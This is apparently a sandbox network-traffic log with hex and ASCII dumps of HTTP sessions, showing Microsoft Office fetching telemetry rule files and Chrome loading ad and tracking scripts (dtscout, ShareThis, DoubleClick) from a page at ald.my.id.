                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          37192.168.2.74975613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: eb753988-701e-0021-591f-1c3d45000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091235Z-17db6f7c8cfpm9w8b1ybgtytds000000040000000000be1m
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          38192.168.2.749761141.101.120.104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC779OUTGET /idg/?su=1040172889715587758A2B28B3F6BBD2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.dtscout.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y9%2FKo6JO7h4%2FNlyGxQB5XzQ4MBbjVQU1d3QutNqWN63zcZvBZ64SDOsRCckmPma1jbQVc3lpOLJsotduoIoj3UvQpUbYek%2FT7O54cXRNZYd43dZcE8Rmai8dZ2KuZ%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672d948224400-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC762INData Raw: 35 34 36 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 75 69 64 5f 67 20 20 3d 20 27 31 30 34 30 31 37 32 38 38 39 37 31 35 35 38 37 37 35 38 41 32 42 32 38 42 33 46 36 42 42 44 32 27 3b 20 0a 20 20 20 20 76 61 72 20 75 69 64 5f 73 20 20 3d 20 27 31 30 34 30 31 37 32 38 38 39 37 31 35 36 36 42 32 35 30 34 46 43 39 39 42 46 44 30 35 46 45 46 27 3b 20 0a 20 20 20 20 76 61 72 20 75 69 64 5f 73 75 20 3d 20 27 31 30 34 30 31 37 32 38 38 39 37 31 35 35 38 37 37 35 38 41 32 42 32 38 42 33 46 36 42 42 44 32 27 3b 0a 0a 20 20 20 20 76 61 72 20 64 65 62 75 67 20 3d 20 7b 7d 3b 0a 20 20 20 20 76
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 546<html><head></head><body><script>window.onload = function() { var uid_g = '1040172889715587758A2B28B3F6BBD2'; var uid_s = '104017288971566B2504FC99BFD05FEF'; var uid_su = '1040172889715587758A2B28B3F6BBD2'; var debug = {}; v
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC595INData Raw: 76 61 72 20 75 69 64 20 3d 20 66 61 6c 73 65 0a 20 20 20 20 20 20 20 20 69 66 28 6d 65 74 68 6f 64 20 3d 3d 20 27 67 6f 74 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 69 64 20 3d 20 70 61 73 73 5f 75 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 65 62 75 67 2e 75 69 64 5f 73 72 63 20 3d 20 27 67 6f 74 27 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 28 6c 73 5f 75 69 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 69 64 20 3d 20 6c 73 5f 75 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 65 62 75 67 2e 75 69 64 5f 73 72 63 20 3d 20 27 6c 73 27 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 69 64 20 3d 20 70 61 73 73 5f 75 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var uid = false if(method == 'got') { uid = pass_uid; debug.uid_src = 'got'; } else if(ls_uid) { uid = ls_uid; debug.uid_src = 'ls'; } else { uid = pass_uid; d
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          39192.168.2.749765141.101.120.114432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC673OUTGET /pv/?_a=v&_h=ald.my.id&_ss=1dqyail9op&_pv=1&_ls=0&_u1=1&_u3=1&_cc=us&_pl=d&_cbid=6lao&_cb=_dtspv.c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.dtscout.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC635INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-T: 0.176
                                                                                                                                                                                                                                                                                                                                                                          X-C: 0
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iObOq51Jkzq757SC1%2B5J5Ydhk5WG%2FUNpc4SpEpwC8%2BVCyA12NY4y%2BfIPIdPY0vKaqi6ZA61%2F1IzoGMpCW9kNY7CU%2BUJ%2BL%2B11UdjIssLNrtN0J%2BdU01JWVn7gUWiDhYo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672d94d8643a7-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC57INData Raw: 33 33 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 31 31 37 22 7d 2c 27 36 6c 61 6f 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 33try{_dtspv.c({"b":"chrome@117"},'6lao');}catch(e){}
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          40192.168.2.74976352.59.151.854432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC519OUTGET /pd/dtscout HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pd.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; Path=/; Domain=sharethis.com; Expires=Tue, 14 Oct 2025 09:12:36 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: __stidv=2; Path=/; Domain=sharethis.com; Expires=Tue, 14 Oct 2025 09:12:36 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2444
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC2444INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 74 72 79 20 7b 0a 0a 20 20 20 20 2f 2f 20 73 65 74 20 75 70 20 6f 75 72 20 70 69 78 65 6c 0a 20 20 20 20 76 61 72 20 66 63 6d 70 20 3d 20 74 79 70 65 6f 66 20 5f 5f 63 6d 70 20 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 3b 0a 20 20 20 20 76 61 72 20 66 63 6d 70 76 32 20 3d 20 74 79 70 65 6f 66 20 5f 5f 74 63 66 61 70 69 20 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 3b 0a 20 20 20 20 76 61 72 20 72 6e 64 20 3d 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 0a 20 20 20 20 76 61 72 20 69 6d 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 6d 67 27 29 3b 0a 20 20 20 20 76 61 72 20 65 78 70 74 69 64 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 5a 48 6f 41 41
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function () { try { // set up our pixel var fcmp = typeof __cmp == 'function'; var fcmpv2 = typeof __tcfapi == 'function'; var rnd = Math.random(); var img = document.createElement('img'); var exptid = encodeURIComponent('ZHoAA


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          41192.168.2.74975413.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 4a155f70-001e-0017-2dd7-1a0c3c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091236Z-17db6f7c8cfqxt4wrzg7st2fm800000006d00000000007gz
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          42192.168.2.749766142.250.185.1944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC822OUTGET /pagead/html/r20241009/r20190131/zrt_lookup_fy2021.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC639INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 9031
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Date: Sun, 13 Oct 2024 21:36:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Sun, 27 Oct 2024 21:36:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1209600
                                                                                                                                                                                                                                                                                                                                                                          Age: 41780
                                                                                                                                                                                                                                                                                                                                                                          ETag: 13108003645644964576
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC751INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 6c 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 6d 2c 6e 3b 61 3a 7b 66 6f 72 28 76 61 72 20 61 61 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 76 3d 6c 2c 7a 3d 30 3b 7a 3c 61 61 2e 6c 65 6e 67 74 68 3b 7a 2b 2b 29 69 66 28 76 3d 76 5b 61 61 5b 7a 5d 5d 2c 76 3d 3d 6e 75 6c 6c 29 7b 6e 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 6e 3d 76
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><script>(function(){'use strict';/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var l=this||self;var m,n;a:{for(var aa=["CLOSURE_FLAGS"],v=l,z=0;z<aa.length;z++)if(v=v[aa[z]],v==null){n=null;break a}n=v
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC1390INData Raw: 20 47 28 61 29 7b 47 5b 22 20 22 5d 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 47 5b 22 20 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 76 61 72 20 66 61 3d 63 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 77 65 62 6b 69 74 22 29 21 3d 2d 31 26 26 21 43 28 22 45 64 67 65 22 29 3b 21 43 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 46 28 29 3b 46 28 29 3b 43 28 22 53 61 66 61 72 69 22 29 26 26 28 46 28 29 7c 7c 28 45 28 29 3f 30 3a 43 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 45 28 29 3f 30 3a 43 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 45 28 29 3f 30 3a 43 28 22 45 64 67 65 22 29 29 7c 7c 28 45 28 29 3f 42 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 43 28 22 45 64 67 2f 22 29 29 7c 7c 45 28 29 26 26 42 28 22 4f 70 65 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: G(a){G[" "](a);return a}G[" "]=function(){};var fa=ca().toLowerCase().indexOf("webkit")!=-1&&!C("Edge");!C("Android")||F();F();C("Safari")&&(F()||(E()?0:C("Coast"))||(E()?0:C("Opera"))||(E()?0:C("Edge"))||(E()?B("Microsoft Edge"):C("Edg/"))||E()&&B("Oper
